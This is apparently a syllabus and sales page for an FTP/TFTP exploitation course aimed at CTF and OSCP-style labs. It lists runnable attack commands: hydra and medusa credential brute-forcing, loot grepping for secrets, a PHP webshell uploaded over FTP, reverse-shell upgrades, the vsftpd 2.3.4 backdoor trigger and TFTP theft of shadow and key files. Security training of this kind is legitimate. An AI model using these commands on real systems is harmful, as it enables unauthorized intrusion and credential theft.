FTP Exploitation Mastery
Six modules. Anonymous enumeration to shell delivery. From reading a TFTP config file to chaining FTP, SMB, and Rsync into a root compromise — every technique practised against live running machines, not screenshots.
The FTP Attack Methodology
The four-phase workflow for every FTP target — from first contact to shell delivery.
Phase 1 — Service Discovery
FTP runs on 21/tcp by default. TFTP on 69/udp.
Both are invisible to a TCP-only nmap scan. Run UDP alongside TCP,
and use the default scripts to fingerprint service version and check for anonymous access in one pass.
nmap -sC -sV -p 21,22 TARGET # TCP FTP + SSH
nmap -sU -p 69 TARGET # TFTP (UDP only)
nmap -p 21 --script=ftp-anon TARGET # anonymous check
nmap -p 21 --script=ftp-syst TARGET # OS from SYST cmdPhase 2 — Enumeration
Always try anonymous before touching a password. If anonymous works, mirror everything — you cannot enumerate what you haven't downloaded. When anonymous fails, correlate the banner version against CVE databases before brute-forcing.
# Manual anonymous login
ftp TARGET
Name: anonymous
Password: <press Enter>
ftp> ls -la
ftp> mget *
# Recursive download with lftp
lftp -u anonymous, ftp://TARGET
lftp> mirror . /tmp/loot/Phase 3 — Exploitation
Three primary exploit vectors: (1) known CVE from banner version, (2) credential brute-force, (3) writable FTP directory mapped to web root. On most CTF/OSCP targets the answer is one of these three. Credential reuse is the most overlooked — try every FTP password on SSH.
# Version-based CVE check
searchsploit vsftpd 2.3.4
searchsploit proftpd 1.3.5
# Credential brute-force
hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt \
ftp://TARGET -t 4
# FTP write → webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
ftp> put shell.phpPhase 4 — Pivoting
FTP is rarely the final destination — it's a step in a chain. Data from FTP feeds into SSH, web access, or SMB. A credential found in an FTP config file might open a database. A file uploaded over FTP might execute as root via cron. Always ask: where else does this data or access lead?
# After FTP download — triage for credentials
grep -rEi 'pass|password|secret|key|token|cred' /tmp/loot/
find /tmp/loot -name "*.conf" -o -name "*.ini" \
-o -name "*.xml" -o -name "id_rsa*"
# Test FTP creds on SSH
ssh ftpuser@TARGETThe Six Modules
Complete them in order. Each module has structured hands-on assignments — finish all tasks before moving to the next.
FTP Fundamentals & Anonymous Access
The first question on any FTP target: does it allow anonymous login? Master the FTP command set, active vs passive mode, and anonymous enumeration. TFTP rounds out the module with the most permissive file protocol ever standardised — no authentication, no directory listing, just raw access.
- FTP PORT (active) vs PASV (passive) — firewall behaviour and when each fails
- Anonymous FTP login: username anonymous, password <any email>
- Core FTP commands: LIST, NLST, GET, PUT, MGET, MPUT, binary/ascii mode
- lftp -e 'mirror . /tmp/loot' for recursive anonymous downloads
- nmap --script=ftp-anon and ftp-bounce for automated anonymous check
- TFTP vs FTP: UDP/69, no auth, no directory listing, filename guessing required
- Triage: grep -r 'pass\|key\|cred\|token' loot/ after bulk download
Hands-on assignments for this module are available to Premium members.
Banner Grabbing & Version Exploitation
The FTP banner is the first thing a server tells you — and it's often a security researcher's dream. Version numbers correlate directly to CVE databases. vsftpd 2.3.4's backdoor is the most famous example: a smiley face in the username triggers a root shell on port 6200.
- Manual banner grab: nc -nv TARGET 21 / telnet TARGET 21
- nmap -sV --version-intensity 9 for deep FTP service fingerprinting
- searchsploit vsftpd / proftpd / pure-ftpd / wuftpd for version-based CVEs
- vsftpd 2.3.4 backdoor (CVE-2011-2523): USERNAME:) triggers bind shell on 6200/tcp
- ProFTPd mod_copy (CVE-2015-3306): SITE CPFR / SITE CPTO for unauthenticated file copy
- Banner fingerprinting: OS hints, compile-time paths, software version strings
- Exploit evaluation: reliability, detection profile, version certainty requirement
Hands-on assignments for this module are available to Premium members.
FTP Credential Attacks
When anonymous fails, credential attacks begin. FTP has no built-in rate limiting in most implementations — making it one of the cleanest brute-force surfaces. Learn to build tight, targeted wordlists and run attacks efficiently while avoiding lockouts.
- hydra -l USERNAME -P rockyou.txt ftp://TARGET — single-user brute-force
- hydra -L users.txt -P passwords.txt ftp://TARGET -t 4 — multi-user spray
- medusa -h TARGET -U users.txt -P passwords.txt -M ftp -t 2
- ncrack -p 21 --user ftpuser -P passwords.txt TARGET
- cewl http://TARGET/ — scrape website to build context-specific wordlist
- Password spray vs full brute-force: rate, detection, account lockout logic
- Credential reuse: FTP passwords often appear on SSH, SMB, and web panels
Hands-on assignments for this module are available to Premium members.
TFTP: The No-Auth File Protocol
TFTP is the forgotten attack surface. UDP port 69, zero authentication, no directory listing. Network devices, PXE boot servers, and embedded systems expose critical configurations through it. If you know the filename, you own the file — and nmap's tftp-enum script knows a lot of filenames.
- nmap -sU -p 69 --script tftp-enum for automated filename brute-force
- tftp client workflow: connect → get FILENAME → quit → read
- High-value TFTP targets: backup.conf, running-config, passwd, shadow, id_rsa
- PXE boot abuse: unattend.xml and kickstart.cfg carry plaintext admin credentials
- SecLists/Discovery/TFTP/tftp.txt as enumeration wordlist
- Metasploit auxiliary/scanner/tftp/tftpbrute for automated guessing
- TFTP PUT: test server writability — upload a canary file, check if it persists
Hands-on assignments for this module are available to Premium members.
FTP Write Access & Shell Delivery
A writable FTP directory that overlaps the web root is a one-step webshell delivery. Upload a PHP file via FTP, curl it over HTTP, execute system commands. This chain is a recurring OSCP exam pattern and appears regularly in real-world assessments.
- Confirming FTP write access: PUT test.txt → LIST to verify persistence
- Correlating FTP chroot with HTTP web root via banner paths and directory structure
- PHP webshell delivery: <?php system($_GET['cmd']); ?> over FTP PUT
- ASP/ASPX alternatives for Windows IIS FTP targets
- Bypassing FTP extension filters: double extension, null byte (legacy), case mangling
- Reverse shell upgrade from webshell: nc -e, bash /dev/tcp, python3 one-liner
- Operational cleanup: removing uploaded artefacts after compromise
Hands-on assignments for this module are available to Premium members.
Protocol Chaining: FTP + SMB + Rsync
File protocols rarely stand alone. Real targets run FTP alongside SMB and rsync — each service storing different data, each requiring different tools. The key is correlation: one protocol gives you a username, another gives the password, a third gives you a private key. Master the full sweep.
- Parallel enumeration: FTP + SMB + rsync in a single triage pass
- SMB null session: smbclient -L //TARGET -N, enum4linux -a, crackmapexec
- Rsync module listing: rsync rsync://TARGET/ → mirror with rsync -av
- Cross-protocol credential correlation: same password across FTP / SSH / SMB
- Split-credential discovery: username in one protocol, password fragment in another
- Attack documentation: source artifact → credential → validated access chain
- Tool sequence: nmap → smbclient → ftp → rsync → ssh in one methodical flow
Hands-on assignments for this module are available to Premium members.
FTP Quick Reference
Commands you will run on every FTP-bearing target.
Discovery One-Liner
nmap -sC -sV -p 21,22,69/udp \
--script ftp-anon,ftp-syst,tftp-enum \
TARGETAnonymous Bulk Download
lftp -u anonymous, ftp://TARGET
lftp> mirror . /tmp/loot/
lftp> quit
grep -rEi 'pass|key|cred' /tmp/loot/TFTP Filename Enum
nmap -sU -p 69 --script tftp-enum \
--script-args tftp-enum.filelist=\
/usr/share/seclists/Discovery/TFTP/tftp.txt \
TARGETBrute-Force
hydra -l ftpuser \
-P /usr/share/wordlists/rockyou.txt \
ftp://TARGET -t 4